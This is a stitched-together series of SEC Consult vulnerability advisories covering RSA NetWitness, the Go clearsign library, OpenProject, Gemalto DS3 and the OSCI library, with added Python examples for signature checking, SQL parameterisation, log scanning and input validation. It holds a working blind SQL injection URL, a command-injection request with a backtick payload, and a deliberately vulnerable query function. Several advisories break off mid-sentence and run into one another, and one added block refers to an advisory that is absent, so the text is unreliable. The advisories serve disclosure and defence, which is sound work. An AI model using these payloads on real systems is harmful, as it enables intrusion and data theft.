              title: Authorization Bypass
            product: RSA NetWitness
 vulnerable version: <10.6.6.1, <11.2.1.1
      fixed version: 10.6.6.1, 11.2.1.1
         CVE number: CVE-2019-3724
             impact: Medium
           homepage: https://www.rsa.com
              found: 2018-09-18
                 by: Mantas Juskauskas (Office Vilnius)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."

Source: https://www.rsa.com/en-us/company/about

Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory an unauthorized
attacker can access an administrative resource that may contain plain text
credentials to a 3rd party system. The vendor provides a patch which should
be installed on affected systems.

Vulnerability overview/description:
-----------------------------------
The authorization mechanism provided by the platform is prone to an
authorization bypass vulnerability, which can be easily exploited by
authenticated (but low privileged) remote attackers for gaining access to
administrative information including plaintext passwords.

Proof of concept:
-----------------
A logged-in low privileged user (e.g. with role Analyst) is able to access an
administrative resource by calling the following URL:

https://[host]/admin/system/whois/properties

After the above URL is accessed, the server returns the following HTTP
response that contains sensitive information about a 3rd party whois service,
including plaintext passwords:

HTTP/1.1 200 OK
Server: nginx
Date: [snip]
Content-Type: application/json;charset=UTF-8
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: [snip]
Content-Length: 795

{"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":10,"cacheMaxSize":5,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":10,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":259200},"cache-max-size":5,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":6

Vulnerable / tested versions:
-----------------------------
The identified vulnerability has been verified to exist in the RSA NetWitness
platform, version 11.1.0.1. According to the vendor, platform version 10 is
also affected.

The following versions are vulnerable:
* <10.6.6.1
* <11.2.1.1

Vendor contact timeline:
------------------------
2018-10-01: Contacting vendor through PGP via sec...@dell.com
2018-10-02: Vendor acknowledges the information was received, forwards the
            info to the relevant department
2018-10-11: Vendor confirms the impact of the authorization issue, starts to
            work on the remediation timeline
2018-10-15: Vendor provides additional information
2018-10-22: Contacting vendor to provide the remediation timeline
2018-10-23: Further email exchange related to the remediation timeline
2019-01-18: Vendor provides an update on the fix timeline
2019-03-05: Asking for a status update
2019-03-06: Vendor provides a status update on the release, patch for
            platform version 11 will be released in March, version 10
            Mid-April
2019-04-01: Asking for a specific release date & further status update
2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change,
            they will inform us
2019-05
SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)
SEC Consult Vulnerability Lab Security Advisory < 20190513-0 >
=======================================================================
              title: Cleartext message spoofing
            product: Supplementary Go Cryptography Libraries
 vulnerable version: commit a5d413f7728c81fb97d96a2b722368945f651e78
                     branch master (https://github.com/golang/crypto.git)
      fixed version: commit c05e17bb3b2dca130fc919668a96b4bec9eb9442
         CVE number: CVE-2019-11841
             impact: High
           homepage: https://golang.org
              found: 2019-03-28
                 by: Aida Mynzhasova (Office Berlin)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Package clearsign generates and processes OpenPGP, clear-signed data. See
RFC 4880, section 7. Clearsigned messages are cryptographically signed, but
the contents of the message are kept in plaintext so that it can be read
without special tools."

Source: https://godoc.org/golang.org/x/crypto/openpgp/clearsign

Business recommendation:
------------------------
During a short security test, SEC Consult found a severe security
vulnerability in the clearsign package of supplementary Go cryptography
libraries. This vulnerability could allow an attacker:
- to lead a victim to believe the signature was generated using a different
  message digest algorithm than what was actually used;
- to spoof clearsign OpenPGP messages by prepending arbitrary text to
  cleartext messages without invalidating the signatures.

Vulnerability overview/description:
-----------------------------------
1) Cleartext message spoofing
According to RFC 4880 chapter 7 the cleartext signed message can contain one
or more optional "Hash" Armor Headers. The "Hash" Armor Header specifies the
message digest algorithm(s) used for the signature. However, the package
"clearsign" in supplementary Go cryptography libraries ignores the value of
this header, which allows an attacker to spoof it. Thereby an attacker can
lead a victim to believe the signature was generated using a different
message digest algorithm than what was actually used.

Moreover, since the library skips Armor Header parsing in general, an
attacker can not only embed arbitrary Armor Headers, but also prepend
arbitrary text to cleartext messages without invalidating the signatures: the
library treats everything before the first blank line as header and leaves it
out of the verified text, while a reader sees it as part of the message.

Proof of concept:
-----------------
1) Cleartext message spoofing
The following cleartext message with a valid SHA-1 signature was generated
using GnuPG (content of no_spoof.asc file):

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Message to be signed
-----BEGIN PGP SIGNATURE-----

iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-----END PGP SIGNATURE-----

Then the message was tampered with by changing the value of the "Hash" Armor
Header from SHA-1 to SHA-512 (content of hash_spoof.asc file):

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Message to be signed
-----BEGIN PGP SIGNATURE-----

iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-----END PGP SIGNATURE-----

Finally, a string starting with the Unicode character "LINE TABULATION"
(U+000B, written as \u000b below) was embedded in the Armor Header of the
message (content of cleartext_spoof.asc file):

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512\u000bThis data is part of the header

Message to be signed
-----BEGIN PGP SIGNATURE-----

iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-----END PGP SIGNATURE-----

When inserting the "LINE TABULATION" character, the header text after the
attached character looks as if it were p
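The three findings in the OpenPGP.js advisory (SA-20190822-0 above) and the clearsign finding here are all failures to check something the OpenPGP format makes checkable: the signature type, which subpacket area a value came from, and whether the "Hash" armor header agrees with the signature packet. The following parser is an added example, not code from OpenPGP.js, golang.org/x/crypto or SEC Consult, and it does not verify the RSA signature value; it shows the structural checks a strict implementation performs. The GnuPG signature block from the PoC above is reused verbatim as input (it is a v4 RSA/SHA-1 text signature), the three messages are rebuilt around it, and the forged timestamp-type packet in the usage note is derived by patching one byte of that real packet.

```python
import base64
import struct

HASH_NAMES = {1: "MD5", 2: "SHA1", 8: "SHA256", 9: "SHA384", 10: "SHA512", 11: "SHA224"}


def parse_subpackets(area):
    """[(type, data)] from a signature subpacket area (RFC 4880, 5.2.3.1)."""
    out, i = [], 0
    while i < len(area):
        first = area[i]
        if first < 192:
            length, i = first, i + 1
        elif first < 255:
            length, i = ((first - 192) << 8) + area[i + 1] + 192, i + 2
        else:
            length, i = struct.unpack(">I", area[i + 1:i + 5])[0], i + 5
        if length < 1 or i + length > len(area):
            raise ValueError("truncated subpacket")
        out.append((area[i] & 0x7F, bytes(area[i + 1:i + length])))
        i += length
    return out


def parse_v4_signature(packet):
    """Old-format (tag 2) v4 signature packet; hashed and unhashed areas stay separate."""
    tag = packet[0]
    hdr = {0: 2, 1: 3, 2: 5}.get(tag & 0x03)  # explicit 1/2/4-octet length only
    if tag & 0xC0 != 0x80 or (tag >> 2) & 0x0F != 2 or hdr is None:
        raise ValueError("not an old-format signature packet")
    declared = int.from_bytes(packet[1:hdr], "big")
    body = packet[hdr:hdr + declared]
    if declared < 6 or len(body) != declared or body[0] != 4:
        raise ValueError("truncated packet or not version 4")
    sig, pos = {"type": body[1], "pubkey_alg": body[2], "hash_alg": body[3]}, 4
    for area in ("hashed", "unhashed"):
        n = struct.unpack(">H", body[pos:pos + 2])[0]
        sig[area] = parse_subpackets(body[pos + 2:pos + 2 + n])
        pos += 2 + n
    return sig


def creation_time(sig):
    """Signed creation time only; the unhashed area is unsigned and never overrides it."""
    for sub_type, data in sig["hashed"]:
        if sub_type == 2:  # signature creation time subpacket
            return struct.unpack(">I", data)[0]
    raise ValueError("no signed creation time")


def check_message_signature(sig):
    """Only binary (0x00) or text (0x01) signatures sign a message; standalone
    (0x02) or timestamp (0x40) ones cover nothing but their own subpackets."""
    if sig["type"] not in (0x00, 0x01):
        raise ValueError("type 0x%02x is not a message signature" % sig["type"])
    return sig["type"]


def parse_clearsigned(text):
    """Split a cleartext-signed message (RFC 4880, section 7).  Only "Hash:"
    headers are accepted and a control character in one (e.g. the vertical
    tab above) is an error, so nothing can hide in the header block."""
    lines = text.split("\n")
    if lines[0] != "-----BEGIN PGP SIGNED MESSAGE-----":
        raise ValueError("missing cleartext header line")
    hashes, i = [], 1
    while i < len(lines) and lines[i] != "":
        key, sep, value = lines[i].partition(": ")
        if key != "Hash" or not sep or any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
            raise ValueError("invalid armor header %r" % lines[i])
        hashes += [h.strip() for h in value.split(",")]
        i += 1
    sig_start = lines.index("-----BEGIN PGP SIGNATURE-----", i)   # ValueError if absent
    sig_end = lines.index("-----END PGP SIGNATURE-----", sig_start)
    body = "\n".join(l[2:] if l.startswith("- ") else l for l in lines[i + 1:sig_start])
    # skip the blank line, "Version:"-style armor headers and the "=CRC24" line
    b64 = "".join(l for l in lines[sig_start + 1:sig_end] if l and ":" not in l and l[0] != "=")
    return hashes, body, base64.b64decode(b64)


def verify_hash_header(text):
    """Accept only if a "Hash:" header names the algorithm the signature packet
    really uses; returns (algorithm, body, parsed signature)."""
    hashes, body, packet = parse_clearsigned(text)
    sig = parse_v4_signature(packet)
    check_message_signature(sig)
    actual = HASH_NAMES.get(sig["hash_alg"], "unknown")
    if actual not in hashes:
        raise ValueError("Hash header %s, signature uses %s" % (hashes, actual))
    return actual, body, sig


# The GnuPG signature block from the advisory above, reused verbatim.
SIGNATURE_ARMOR = """-----BEGIN PGP SIGNATURE-----

iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-----END PGP SIGNATURE-----"""

# The advisory's three messages, rebuilt around that one signature.
MESSAGES = {
    name: "-----BEGIN PGP SIGNED MESSAGE-----\n%s\n\nMessage to be signed\n%s" % (hdr, SIGNATURE_ARMOR)
    for name, hdr in [("no_spoof", "Hash: SHA1"), ("hash_spoof", "Hash: SHA512"),
                      ("cleartext_spoof", "Hash: SHA512\x0bThis data is part of the header")]
}
```

`verify_hash_header(MESSAGES["no_spoof"])` returns `("SHA1", "Message to be signed", sig)`: the packet decodes to 310 bytes, a type 0x01 (text) signature with hash algorithm 2 (SHA-1), a hashed area holding an issuer-fingerprint subpacket and the creation time 1553860803 (2019-03-29), and an unhashed area holding only the issuer key ID. The hash_spoof message is rejected because the header says SHA512 while the packet says SHA-1, and cleartext_spoof is rejected at the header line because of the vertical tab. For the OpenPGP.js side, `creation_time` ignores the unhashed area by construction, and patching the type byte of the real packet to 0x40 (`packet[:4] + b"\x40" + packet[5:]`) makes `check_message_signature` refuse it, which is exactly the standalone/timestamp substitution described under CVE-2019-9153.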
SEC Consult SA-20190510-0 :: Unauthenticated SQL Injection vulnerability in OpenProject
SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
=======================================================================
              title: Unauthenticated SQL Injection vulnerability
            product: OpenProject
 vulnerable version: 5.0.0 - 8.3.1
      fixed version: 8.3.2 & 9.0.0
         CVE number: CVE-2019-11600
             impact: Critical
           homepage: https://www.openproject.org
              found: 2019-04-17
                 by: T. Soo (Office Bangkok)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"OpenProject is the leading open source project management software. Support
your project management process along the entire project life cycle: From
project initiation to closure."

Source: https://www.openproject.org/

Business recommendation:
------------------------
The vendor provides a patch which should be applied immediately. An in-depth
security analysis performed by security professionals is highly advised, as
the software may be affected from further security issues.

Vulnerability overview/description:
-----------------------------------
An SQL injection vulnerability has been identified in the web "activities
API". An unauthenticated attacker could successfully perform an attack to
extract potentially sensitive information from the database if OpenProject is
configured not to require authentication for API access.

Proof of concept:
-----------------
Requesting the following URL will trigger a time delay as a proof of concept
for exploiting the blind SQL injection:

http:///api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(%3d

Vulnerable / tested versions:
-----------------------------
The vulnerability has been identified in OpenProject version 8.3.1 which was
the most current version at the time of discovery. According to the vendor
all versions between 5.0.0 and 8.3.1 are affected. Older versions (< 5.0.0)
are not vulnerable.
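The payload above is shaped to close the parenthesis the application opens around the activity id, append a condition (here a `pg_sleep` call whose delay is the blind oracle) and reopen a parenthesis so the rest of the application's own SQL still parses. The following pair of functions is an added example, not OpenProject's code (which is Ruby on Rails against PostgreSQL); it uses an in-memory SQLite table with constructed rows to show the same injection shape against string-built SQL and the parameterised form that stops it. SQLite has no `pg_sleep`, so the payload uses an always-true condition instead of a delay.

```python
import sqlite3


def make_db():
    """In-memory stand-in for an activities table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE activities (id INTEGER PRIMARY KEY, project TEXT, note TEXT)")
    conn.executemany("INSERT INTO activities VALUES (?, ?, ?)", [
        (1, "public", "release notes"),
        (2, "internal", "salary review"),
        (3, "internal", "merger plan"),
    ])
    return conn


def vulnerable_lookup(conn, ids):
    """Splices the caller-supplied id list straight into the IN (...) clause,
    the mistake class behind CVE-2019-11600."""
    sql = ("SELECT id, note FROM activities WHERE id IN (%s) "
           "AND project = 'public' ORDER BY id" % ids)
    return conn.execute(sql).fetchall()


def safe_lookup(conn, ids):
    """Validates every id as an integer and binds each one as a parameter."""
    id_list = [int(i) for i in ids.split(",")]        # ValueError on anything else
    placeholders = ", ".join("?" * len(id_list))
    sql = ("SELECT id, note FROM activities WHERE id IN (%s) "
           "AND project = 'public' ORDER BY id" % placeholders)
    return conn.execute(sql, id_list).fetchall()


# Same shape as the advisory's payload: close the IN (...) parenthesis, add a
# condition that is always true, reopen a parenthesis so the trailing SQL
# still parses.  With pg_sleep() in place of 1=1 this becomes the blind,
# time-based variant from the PoC.
PAYLOAD = "1) OR 1=1 OR (1=1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_lookup(db, PAYLOAD))   # leaks the internal rows
    try:
        safe_lookup(db, PAYLOAD)
    except ValueError as err:
        print("safe: rejected input,", err)
```

The string-built query turns into `WHERE id IN (1) OR 1=1 OR (1=1) AND project = 'public'`, which returns every row including the internal ones; the parameterised version never reaches the database because the payload is not an integer, and even a syntactically valid list of ids can only ever select by id.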
Vendor contact timeline: 2019-04-30: Contacting vendor through secur...@openproject.com 2019-04-30: A patch is published in version 8.3.2 2019-05-06: Vendor publishes further details 2019-05-10: Release of security advisory Solution: - The vendor provides a patched version 8.3.2 and a security notice with further information: https://www.openproject.org/release-notes/openproject-8-3-2 https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Thanaphon Soo / @2019 smime.p7s Description: S/MIME Cryptographic Signature
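As an added illustration (not part of the advisory and not OpenProject code), the following Python scans web-server access-log lines for the time-based blind SQL injection probe shown in the proof of concept above. The log lines are constructed here, the combined log format is assumed, and the indicator list is a minimal starting point that a production detection would extend; the point is that the path must be fully URL-decoded before matching, because the probe arrives percent-encoded.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format assumed). The second line
# carries the PG_SLEEP-based probe from the advisory, the third a MySQL-style variant.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Apr/2019:10:00:01 +0000] "GET /api/v3/activities/1 HTTP/1.1" 200 812
203.0.113.7 - - [17/Apr/2019:10:00:05 +0000] "GET /api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(%3d HTTP/1.1" 500 0
198.51.100.9 - - [17/Apr/2019:10:00:09 +0000] "GET /api/v3/activities/1%20AND%20SLEEP(5) HTTP/1.1" 200 12
203.0.113.7 - - [17/Apr/2019:10:00:12 +0000] "GET /api/v3/work_packages HTTP/1.1" 200 4096
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of time-based blind SQL injection, matched against the fully decoded path.
TIME_BASED_RE = re.compile(
    r"(pg_sleep\s*\(|\bsleep\s*\(|waitfor\s+delay|benchmark\s*\()", re.IGNORECASE
)


def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so %2520-style double encoding cannot hide a payload."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(text):
    """Return (source, timestamp, decoded_path) for every request that looks like a timing probe."""
    hits = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        path = decode_fully(match.group("path"))
        if TIME_BASED_RE.search(path):
            hits.append((match.group("src"), match.group("ts"), path))
    return hits


if __name__ == "__main__":
    for src, ts, path in scan_log(SAMPLE_LOG):
        print(f"{ts} {src} {path}")
```

Run over real logs, the same function would be pointed at the access log of the reverse proxy in front of OpenProject; a hit on an unauthenticated /api/v3/ path is exactly the condition the advisory describes.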
SEC Consult SA-20190509-0 :: Multiple Vulnerabilities in Gemalto (Thales Group) DS3 Authentication Server / Ezio Server
SEC Consult Vulnerability Lab Security Advisory < 20190509-0 >
=======================================================================
              title: Multiple Vulnerabilities
            product: Gemalto (Thales Group) DS3 Authentication Server / Ezio Server
 vulnerable version: Ezio DS3 server
                     https://www.gemalto.com
              found: 2019-02-11
                 by: TING Meng Yean (Office Singapore)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
DS3 Authentication Server is an appliance that provides authentication and end-to-end encryption for online banking and remote transactions. DS3 has been acquired by Gemalto, and the Authentication Server is now known as the Gemalto Ezio Server. Gemalto is now part of the Thales Group.

Source: http://www.fisid.ch/products/ds3-main-products.html
Source: https://www.gemalto.com/financial/ebanking/ezio-server
Source: https://www.thalesgroup.com/en/group/journalist/press-release/thales-completes-acquisition-gemalto-become-global-leader-digital

Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged to upgrade to the latest version available. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected by further security issues.

Vulnerability overview/description:
-----------------------------------
The DS3 Authentication Server is prone to several security issues, described below, that, when combined, allow a low-privileged application user to upload a JSP web shell running with the access rights of the low-privileged Linux system user "asadmin". The CVSSv3 scores have been provided by the vendor.

1) Semi-Blind OS Command Injection (Post-authenticated) - CVE-2019-9156 - CWE-78 - CVSSv3: 6.8 (Medium)
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
The DS3 Authentication Server provides several administration tools to perform connectivity checks. "TestTelnetConnection.jsp" does not correctly validate the user input for the "HOST_NAME" and "PORT_NUMBER" parameters, allowing an attacker to execute arbitrary commands on the server side with the privileges of the local system user "asadmin".

2) Limited Local File Disclosure (LFD) (Post-authenticated) - CVE-2019-9157 - CWE-538 - CVSSv3: 5.7 (Medium)
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
The DS3 Authentication Server provides several administration tools to check the system's access and error logs. "TailLogs.jsp" does not correctly validate the user input for the "LOG_TYPE" parameter, allowing an attacker to read arbitrary local files with the privileges of the local system user "asadmin".

3) Broken Access Control (Post-authenticated) - CVE-2019-9158 - CWE-284 - CVSSv3: 5.7 (Medium)
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
The DS3 Authentication Server provides several permission groups granting different levels of privileges, from the administrative "dsssAdmin" group to the low-privileged "READ_ONLY" group. A user in the "dsssAdmin" group sees more functions in the menu of the web portal than a user in the "READ_ONLY" group. However, a user in the "READ_ONLY" group can access some "dsssAdmin" functions by replaying the POST or GET request directly.

Proof of concept:
-----------------
1) Semi-Blind OS Command Injection (Post-authenticated) (CVE-2019-9156)
This PoC was performed with a user in the "READ_ONLY" group. The exploit has the following two restrictions:
1) The injected bash commands cannot contain any space (' '/%20).
2) The output of the injected bash commands must be empty or must not contain any space (' '/%20).
However, the tester was able to build complex bash command payloads without any space (' '/%20) by using a bash trick.

The simple OS command payload "whoami" is injected into the "HOST_NAME" parameter; the HTTP response contains the result of the payload, "asadmin", mixed into the page. Note that the OS command payload is enclosed in backtick (``) characters.

POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=
Content-Type: application/x-www-form-urlencoded
Content-Length: 132

CSRFTOKEN=_NAME=127.0.0.1`whoami`_NUMBER=8443_RESULTS=%0D%0A%09%09%09%09%09%09

HTTP/1.1 200 OK
Str
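The defensive side of vulnerability 1, as an added example and not vendor code: allow-list validation of the two parameters, followed by an argv-style invocation that never passes them through a shell. The `nc` command line is a hypothetical stand-in for whatever the JSP actually runs; only the validation matters here. Note that a blocklist which merely strips spaces is not a fix, because bash has other ways of separating arguments (`${IFS}` among them), which is what makes the "bash trick" above possible; an allow-list of hostname characters rejects the backtick payload regardless.

```python
import ipaddress
import re

# RFC 1123 hostname label: letters, digits and inner hyphens. No shell metacharacter
# (backtick, $, ;, |, &, whitespace) can ever satisfy this pattern.
_LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_host(value):
    """Accept an IPv4/IPv6 literal or a DNS hostname; reject everything else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    if not value or len(value) > 253:
        return False
    return all(_LABEL_RE.match(label) for label in value.rstrip(".").split("."))


def is_valid_port(value):
    """Digits only, within the TCP port range; '8443;id' or '8443`id`' never passes."""
    return value.isdigit() and 1 <= int(value) <= 65535


def build_probe_argv(host, port):
    """Build the connectivity check as an argv list (no shell) after allow-list validation.
    Hypothetical replacement for a 'telnet host port' style check; 'nc -z' is an assumption."""
    if not is_valid_host(host):
        raise ValueError("invalid HOST_NAME")
    if not is_valid_port(port):
        raise ValueError("invalid PORT_NUMBER")
    return ["nc", "-z", "-w", "3", host, str(int(port))]


if __name__ == "__main__":
    print(build_probe_argv("127.0.0.1", "8443"))
    for bad in ("127.0.0.1`whoami`", "127.0.0.1;id", "$(id)"):
        print(bad, "->", is_valid_host(bad))
```

The returned list would be handed to subprocess.run without shell=True; with that combination, even a validation bypass would land in an argument, not in a command line.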
SEC Consult SA-20190205-0 :: Multiple vulnerabilities in OSCI-Transport Library 1.2 for German e-Government
A blog post with further information has been released on this topic as well:
https://r.sec-consult.com/osci

SEC Consult Vulnerability Lab Security Advisory < 20190205-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: OSCI-Transport Library 1.2 for German e-Government
 vulnerable version: <=1.8.1
      fixed version: 1.8.3
         CVE number: -
             impact: low - critical (highly dependent on the usage scenario)
           homepage: http://www.xoev.de
              found: 2018-09
                 by: W. Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
(German original, translated to English)
"The specification of the OSCI-Transport protocol in version 1.2 describes a secure, vendor-independent and interoperable data exchange format. To ease the implementation for users in public administration as well as for vendors of specialist applications, the OSCI 1.2 library is offered: the library implements OSCI-Transport in version 1.2 and is therefore independent of domain-specific content. It is part of the OSCI-Transport infrastructure. The OSCI-Transport library is intended to be integrated into specialist applications (on the administration side) or client systems (on the customer side)."

Source: https://www.xoev.de/die_standards/osci_transport/osci_transport_1_2/osci_1_2_bibliothek-2310

Business recommendation:
------------------------
The OSCI 1.2 Transport Library is intended to provide a secure message exchange channel over an untrusted network (i.e. the Internet) for German government agencies. In 2017 SEC Consult found several critical security vulnerabilities in the OSCI 1.2 Transport library version 1.6.1. These vulnerabilities have been addressed in version 1.7.1. Further details on these vulnerabilities can be found here:
https://www.sec-consult.com/en/blog/2017/06/german-e-government-details-vulnerabilities/

In 2018 SEC Consult identified vulnerabilities in this library again. An attacker could use these vulnerabilities to forge signatures of request-and-response-signed and request-and-response-encrypted messages. Whether there is an impact on content signatures and content encryption was not fully examined!

As the newly identified vulnerabilities are similar to the vulnerabilities identified in 2017, and due to the high complexity of this library, SEC Consult suspects further vulnerabilities that have not yet been discovered. Therefore, SEC Consult strongly recommends that KoSIT and its partners conduct a full security audit of the software component.

Vulnerability overview/description:
-----------------------------------
1) Insecure Cryptographic Algorithm
KoSIT is in the process of replacing legacy encryption algorithms with AES-GCM. Currently, the OSCI 1.2 Transport library still supports the following legacy encryption algorithms:
* http://www.w3.org/2001/04/xmlenc#tripledes-cbc
* http://www.w3.org/2001/04/xmlenc#aes128-cbc
* http://www.w3.org/2001/04/xmlenc#aes192-cbc
* http://www.w3.org/2001/04/xmlenc#aes256-cbc

All of these algorithms are no longer recommended by the W3C:
"Note: Use of AES GCM is strongly recommended over any CBC block encryption algorithms as recent advances in cryptanalysis [...] have cast doubt on the ability of CBC block encryption algorithms to protect plain text when used with XML Encryption" (https://www.w3.org/TR/xmlenc-core1/)

Although these have been marked as deprecated, AES256-CBC is still used by default (see Constants.DEFAULT_SYMMETRIC_CIPHER_ALGORITHM).

